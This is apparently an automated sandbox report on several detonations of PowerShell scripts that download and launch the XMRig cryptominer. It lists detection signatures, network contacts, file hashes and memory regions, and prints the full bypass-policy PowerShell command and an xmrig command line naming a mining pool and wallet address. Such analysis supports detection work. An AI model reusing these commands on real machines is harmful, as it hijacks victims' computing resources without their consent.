N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4740-2-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-5-0x000001966BC20000-0x000001966BC42000-memory.dmp

memory/4740-8-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-9-0x000001966BDD0000-0x000001966BE46000-memory.dmp

memory/4740-10-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wwxvpcu.rh0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-48-0x000001966BDB0000-0x000001966BDC2000-memory.dmp

memory/4740-61-0x000001966BDA0000-0x000001966BDAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1996-90-0x00000157FFD50000-0x00000157FFD70000-memory.dmp

memory/1996-91-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-92-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/4740-93-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-94-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-95-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/1996-96-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-97-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-98-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-99-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-100-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-101-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-102-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-103-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-104-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-105-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-106-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-107-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-108-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-109-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-110-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-111-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-112-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-113-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-114-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-115-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-116-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-117-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-118-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-119-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-120-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-121-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-122-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-123-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-124-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-125-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-126-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-127-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-128-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-129-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-130-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-131-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-132-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-133-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-134-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-135-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-136-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-137-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-138-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-139-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-140-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-141-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-142-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-143-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-144-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-145-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-146-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-147-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-148-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-149-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-150-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-151-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-152-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-153-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-154-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-155-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-156-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win7-20240220-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/840-4-0x000007FEF5B9E000-0x000007FEF5B9F000-memory.dmp

memory/840-7-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

memory/840-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/840-9-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-8-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-10-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-11-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-12-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3800-0-0x00007FFB24C93000-0x00007FFB24C95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yb0neiay.uck.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3800-9-0x000002DB510C0000-0x000002DB510E2000-memory.dmp

memory/3800-10-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-11-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-12-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-14-0x000002DB51080000-0x000002DB51092000-memory.dmp

memory/3800-15-0x000002DB38C20000-0x000002DB38C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4932-46-0x0000021BCAAA0000-0x0000021BCAAC0000-memory.dmp

memory/4932-47-0x0000021BCAAF0000-0x0000021BCAB10000-memory.dmp

memory/4932-48-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/3800-49-0x00007FFB24C93000-0x00007FFB24C95000-memory.dmp

memory/4932-51-0x0000021BCAB10000-0x0000021BCAB30000-memory.dmp

memory/4932-52-0x0000021BCAB30000-0x0000021BCAB50000-memory.dmp

memory/3800-50-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/4932-53-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/3800-54-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/4932-55-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-56-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-58-0x0000021BCAB30000-0x0000021BCAB50000-memory.dmp

memory/4932-57-0x0000021BCAB10000-0x0000021BCAB30000-memory.dmp

memory/4932-59-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-60-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-61-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-62-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-63-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-64-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-65-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-66-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-67-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-68-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-69-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-70-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-71-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-72-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-73-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-74-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-75-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-76-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-77-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-78-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-79-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-80-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-81-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-82-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-83-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-84-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-85-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-86-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-87-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-88-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-89-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-90-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-91-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-92-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-93-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-94-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-95-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-96-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-97-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-98-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-99-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-100-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-101-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-102-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-103-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-104-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-105-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-106-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-107-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-108-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-109-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-110-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-111-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-112-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-113-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-114-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-115-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-116-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-117-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:39

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3320-0-0x00007FFC5C893000-0x00007FFC5C895000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nya3b3ic.4ho.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3320-9-0x000001F7B3A60000-0x000001F7B3A82000-memory.dmp

memory/3320-10-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-11-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-12-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-14-0x000001F7B3C10000-0x000001F7B3C22000-memory.dmp

memory/3320-15-0x000001F7B3AB0000-0x000001F7B3ABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1228-46-0x00000297CE3D0000-0x00000297CE3F0000-memory.dmp

memory/1228-47-0x00000297CE420000-0x00000297CE440000-memory.dmp

memory/1228-48-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/3320-49-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/1228-51-0x00000297CE460000-0x00000297CE480000-memory.dmp

memory/1228-50-0x00000297CE440000-0x00000297CE460000-memory.dmp

memory/3320-53-0x00007FFC5C893000-0x00007FFC5C895000-memory.dmp

memory/1228-52-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-54-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-57-0x00000297CE460000-0x00000297CE480000-memory.dmp

memory/1228-56-0x00000297CE440000-0x00000297CE460000-memory.dmp

memory/1228-55-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-58-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-59-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-60-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-61-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-62-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-63-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-64-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-65-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-66-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-67-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

